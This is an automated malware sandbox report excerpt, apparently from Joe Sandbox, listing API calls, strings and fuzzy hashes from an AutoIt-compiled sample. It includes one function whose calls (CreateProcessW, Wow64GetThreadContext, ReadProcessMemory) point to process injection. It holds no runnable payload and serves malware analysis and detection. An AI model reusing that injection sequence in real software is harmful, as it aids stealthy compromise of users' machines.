                        • Part of subcall function 00E76BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E76D0D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _free$CurrentDirectoryLibraryLoad
                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                      • API String ID: 2861923089-1757145024
                      • Opcode ID: e1ad0b9f50d75254aa36c96e23e137f575a196c41ddb4fa2f0d903b6f6e36213
                      • Instruction ID: 65e2691ba1eb1b637827e73e4da613e5de256d268d6d78f8e86b531030bf98b4
                      • Opcode Fuzzy Hash: e1ad0b9f50d75254aa36c96e23e137f575a196c41ddb4fa2f0d903b6f6e36213
                      • Instruction Fuzzy Hash: 9C915F71A10219AFCF04EFA4C8919EDB7F4FF19314F14A46AF815BB291EB31A905CB60
                      APIs
                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E735A1,SwapMouseButtons,00000004,?), ref: 00E735D4
                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E735A1,SwapMouseButtons,00000004,?,?,?,?,00E72754), ref: 00E735F5
                      • RegCloseKey.KERNELBASE(00000000,?,?,00E735A1,SwapMouseButtons,00000004,?,?,?,?,00E72754), ref: 00E73617
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 3677997916-824357125
                      • Opcode ID: 7fe7090c547cd38f7ebbde8c767f35deeff099f94af8abca8c003ebc4bb5c2d0
                      • Instruction ID: ce37d46f2f558ec3cb82ae9276af5ed391c3f23f2a73bded6d88e5f28e311d81
                      • Opcode Fuzzy Hash: 7fe7090c547cd38f7ebbde8c767f35deeff099f94af8abca8c003ebc4bb5c2d0
                      • Instruction Fuzzy Hash: BE114871511218BFDB20CFA5DC40DFEB7B8EF44744F1094A9E809E7210E6719E44A760
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01711B2D
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01711B51
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01711B73
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                      • Instruction ID: 86bf625ef1918044931823985b7e9527ef8bdf9902a4b2d2a2acbba215dc1586
                      • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                      • Instruction Fuzzy Hash: 93620930A14258DBEB24CFA8C840BDEB776EF58300F5091A9D20DEB394E7759E85CB59
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                      • String ID:
                      • API String ID: 2782032738-0
                      • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                      • Instruction ID: 3f6cac453099906a3919d695f42c9aca0de200aa7605659fdad44d18d272c154
                      • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                      • Instruction Fuzzy Hash: 0E41D6B0A006069BDF28CE69C880DAF77A5EF84364B24A17DE855E76D0E7B09D428744
                      APIs
                      • _memset.LIBCMT ref: 00EAEE62
                      • GetOpenFileNameW.COMDLG32(?), ref: 00EAEEAC
                        • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                        • Part of subcall function 00E909D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E909F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Name$Path$FileFullLongOpen_memset
                      • String ID: X
                      • API String ID: 3777226403-3081909835
                      • Opcode ID: d0c02f33132e4088d6164fdc1bf2d107aeb86ac62574f04b8cf37db03e96f0b2
                      • Instruction ID: 51987417e392977333876d3efedd8b7e1782d45b5b5d497c36a25ad85b33d819
                      • Opcode Fuzzy Hash: d0c02f33132e4088d6164fdc1bf2d107aeb86ac62574f04b8cf37db03e96f0b2
                      • Instruction Fuzzy Hash: CE21C070A042989BCF51DF94D845BEE7BF89F49314F00805AE508FB282DBF859898BA1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __fread_nolock_memmove
                      • String ID: EA06
                      • API String ID: 1988441806-3962188686
                      • Opcode ID: fc43cc2337615227d39750956cb4a0b193d89d4df2b177ad52e3b4c59ccf53bb
                      • Instruction ID: 3a7350137429ebed2aa65b9b4f1f7550f88e8a538b3d116c00e33630f62b4fc8
                      • Opcode Fuzzy Hash: fc43cc2337615227d39750956cb4a0b193d89d4df2b177ad52e3b4c59ccf53bb
                      • Instruction Fuzzy Hash: AE01F9728042586EDF29C6A8DC16EEE7BFCDB01301F00419BF552E2181E5B5E6048B60
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?), ref: 00ED9B82
                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00ED9B99
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Temp$FileNamePath
                      • String ID: aut
                      • API String ID: 3285503233-3010740371
                      • Opcode ID: 7377799282e648ee3b97351ea58e8096d766caa4f5a07cf1b8456207a172e318
                      • Instruction ID: 1c36f95b4490c169c795af3b608a84f6bcda3c46b875cd1e5bb7c2f693d5d7de
                      • Opcode Fuzzy Hash: 7377799282e648ee3b97351ea58e8096d766caa4f5a07cf1b8456207a172e318
                      • Instruction Fuzzy Hash: 45D05B7554030DAFDB10DB94DC0DFA6772CEB44701F0041A1FE54D11B1DDB09598CB91
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f0417905c7ef22f8b99ef4b2d1485259e5c5a37785a7c9cdbb5b0d24cb0b5d2
                      • Instruction ID: 603e60de9655a59847c5dea68de5136e313ab3308a1d2b86c05a68a0cd6abd52
                      • Opcode Fuzzy Hash: 4f0417905c7ef22f8b99ef4b2d1485259e5c5a37785a7c9cdbb5b0d24cb0b5d2
                      • Instruction Fuzzy Hash: 23F15B715083459FC714DF29C880A6ABBE5FF88314F14992EF899AB352D731E946CF82
                      APIs
                        • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E903D3
                        • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E903DB
                        • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E903E6
                        • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E903F1
                        • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E903F9
                        • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E90401
                        • Part of subcall function 00E86259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E7FA90), ref: 00E862B4
                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E7FB2D
                      • OleInitialize.OLE32(00000000), ref: 00E7FBAA
                      • CloseHandle.KERNEL32(00000000), ref: 00EB49F2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                      • String ID:
                      • API String ID: 1986988660-0
                      • Opcode ID: 6dd382ae33ca4c212a65e16fd66a3ab2febb285d7e7a4e8fd1cd2120bfa34179
                      • Instruction ID: 7e0afae64bde6b127f8b4022bbdc2f0a27f3bd36dce697a08c6d00cef624cc28
                      • Opcode Fuzzy Hash: 6dd382ae33ca4c212a65e16fd66a3ab2febb285d7e7a4e8fd1cd2120bfa34179
                      • Instruction Fuzzy Hash: D181B8B0D05248EEC784EF2AE9416657BE6FB99338750D13AE419DB362EB318405EF60
                      APIs
                      • _memset.LIBCMT ref: 00E74401
                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E744A6
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E744C3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: IconNotifyShell_$_memset
                      • String ID:
                      • API String ID: 1505330794-0
                      • Opcode ID: 9c6486934dec2357874c7e4fee24d48f29720651c6833707a9c051d1c4a98ef1
                      • Instruction ID: 1917528aba760e2f02fd0fc493a13c0a00476ace689a94f2e07a438dce167d3a
                      • Opcode Fuzzy Hash: 9c6486934dec2357874c7e4fee24d48f29720651c6833707a9c051d1c4a98ef1
                      • Instruction Fuzzy Hash: 533180B05043019FD720DF24D884697BBE8FB49318F00492EE5AAE3291E771A948DB52
                      APIs
                      • __FF_MSGBANNER.LIBCMT ref: 00E95963
                        • Part of subcall function 00E9A3AB: __NMSG_WRITE.LIBCMT ref: 00E9A3D2
                        • Part of subcall function 00E9A3AB: __NMSG_WRITE.LIBCMT ref: 00E9A3DC
                      • __NMSG_WRITE.LIBCMT ref: 00E9596A
                        • Part of subcall function 00E9A408: GetModuleFileNameW.KERNEL32(00000000,00F343BA,00000104,?,00000001,00000000), ref: 00E9A49A
                        • Part of subcall function 00E9A408: ___crtMessageBoxW.LIBCMT ref: 00E9A548
                        • Part of subcall function 00E932DF: ___crtCorExitProcess.LIBCMT ref: 00E932E5
                        • Part of subcall function 00E932DF: ExitProcess.KERNEL32 ref: 00E932EE
                        • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                      • RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                      • String ID:
                      • API String ID: 1372826849-0
                      • Opcode ID: d379c5f61122d71b7cadb353deeb2f91a8cf9d1bf4c7335a5f97723001215478
                      • Instruction ID: 7accaab88438d093b54602028f8737ff655c65e42b1c16264371e583a97149f3
                      • Opcode Fuzzy Hash: d379c5f61122d71b7cadb353deeb2f91a8cf9d1bf4c7335a5f97723001215478
                      • Instruction Fuzzy Hash: EE01D233201B15EEFE222B34D842AAE72D98F82738F10202AF525BA191DA70AD018760
                      APIs
                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00ED97D2,?,?,?,?,?,00000004), ref: 00ED9B45
                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00ED97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00ED9B5B
                      • CloseHandle.KERNEL32(00000000,?,00ED97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED9B62
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: File$CloseCreateHandleTime
                      • String ID:
                      • API String ID: 3397143404-0
                      • Opcode ID: a529806bd31b6128cffc9cade133ff683893a4424344b3976720c0daac2d4e24
                      • Instruction ID: 63757f258bacbf4560186655e8884c0c986bde67e84c6ac61fed79335e045e84
                      • Opcode Fuzzy Hash: a529806bd31b6128cffc9cade133ff683893a4424344b3976720c0daac2d4e24
                      • Instruction Fuzzy Hash: 25E02632181214BBD7211F51EC09FDE3B18EF45761F104220FB14780E083B12521C788
                      APIs
                      • _free.LIBCMT ref: 00ED8FA5
                        • Part of subcall function 00E92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C64), ref: 00E92FA9
                        • Part of subcall function 00E92F95: GetLastError.KERNEL32(00000000,?,00E99C64), ref: 00E92FBB
                      • _free.LIBCMT ref: 00ED8FB6
                      • _free.LIBCMT ref: 00ED8FC8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                      • Instruction ID: 6420fe5f7e47bf3503cd94f2d5be047e4d65173d7304b4c8e8cee454473fd42d
                      • Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                      • Instruction Fuzzy Hash: 64E012B17097056ACE24A778AE40A9367EF9F48354B18281EB509FB242DE24F8428124
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID: CALL
                      • API String ID: 0-4196123274
                      • Opcode ID: 5977614ca29219252dd6d5099d15053ab899f94895d59b265e74cb589bb885d0
                      • Instruction ID: c61c4ec44b79115a8db56c5ae2e9eec0ba0b5860b55960a5c56e4ffc8c155dd1
                      • Opcode Fuzzy Hash: 5977614ca29219252dd6d5099d15053ab899f94895d59b265e74cb589bb885d0
                      • Instruction Fuzzy Hash: D8224870508341DFCB24DF14C490B6ABBE1FF84304F18996DE99AAB262D731ED85DB82
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: EA06
                      • API String ID: 4104443479-3962188686
                      • Opcode ID: e79f26896927b01ab1c0db9e5660230a273ee7a8863c55ac0d448dc23a60a913
                      • Instruction ID: 2bcb1e3b5bb36dc67e859af7b3c604b71580c8a3895aef45c712af7fc22358c8
                      • Opcode Fuzzy Hash: e79f26896927b01ab1c0db9e5660230a273ee7a8863c55ac0d448dc23a60a913
                      • Instruction Fuzzy Hash: 82417FB2A045585BCF115B648C517FE7FE6EB05314F58F065F88ABF2C2C7619D4083A1
                      APIs
                      • IsThemeActive.UXTHEME ref: 00E74992
                        • Part of subcall function 00E935AC: __lock.LIBCMT ref: 00E935B2
                        • Part of subcall function 00E935AC: DecodePointer.KERNEL32(00000001,?,00E749A7,00EC81BC), ref: 00E935BE
                        • Part of subcall function 00E935AC: EncodePointer.KERNEL32(?,?,00E749A7,00EC81BC), ref: 00E935C9
                        • Part of subcall function 00E74A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E74A73
                        • Part of subcall function 00E74A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E74A88
                        • Part of subcall function 00E73B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E73B7A
                        • Part of subcall function 00E73B4C: IsDebuggerPresent.KERNEL32 ref: 00E73B8C
                        • Part of subcall function 00E73B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F362F8,00F362E0,?,?), ref: 00E73BFD
                        • Part of subcall function 00E73B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E73C81
                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E749D2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                      • String ID:
                      • API String ID: 1438897964-0
                      • Opcode ID: ff43c187215e1ed68c8006209ed8ea9e4613be4d68e55336c8846a86869efbac
                      • Instruction ID: f02aeac7d8ecf21c1fed18b0e66ceb95c5ef6a0467a16c082d4b0b9dd440fd36
                      • Opcode Fuzzy Hash: ff43c187215e1ed68c8006209ed8ea9e4613be4d68e55336c8846a86869efbac
                      • Instruction Fuzzy Hash: 3111ACB1918305AFCB00EF29DC0591AFBF8EF89720F00852EF448A32A2DB71D545DB92
                      APIs
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E75981,?,?,?,?), ref: 00E75E27
                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00E75981,?,?,?,?), ref: 00EAE19C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: c38b998a59ed7a5b581b04038aa9563e4c9009c5e7f86844d17ecd320586ed25
                      • Instruction ID: ef74f206030e8f26a610b467aaab036a576a110497dfd0543ba1d8652550bed0
                      • Opcode Fuzzy Hash: c38b998a59ed7a5b581b04038aa9563e4c9009c5e7f86844d17ecd320586ed25
                      • Instruction Fuzzy Hash: BD014071244608BEF7250E24CC8AF767B9CEB0576CF10C719BAE97A1E0C6F45E598B50
                      APIs
                        • Part of subcall function 00E9594C: __FF_MSGBANNER.LIBCMT ref: 00E95963
                        • Part of subcall function 00E9594C: __NMSG_WRITE.LIBCMT ref: 00E9596A
                        • Part of subcall function 00E9594C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F
                      • std::exception::exception.LIBCMT ref: 00E9102C
                      • __CxxThrowException@8.LIBCMT ref: 00E91041
                        • Part of subcall function 00E987DB: RaiseException.KERNEL32(?,?,?,00F2BAF8,00000000,?,?,?,?,00E91046,?,00F2BAF8,?,00000001), ref: 00E98830
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
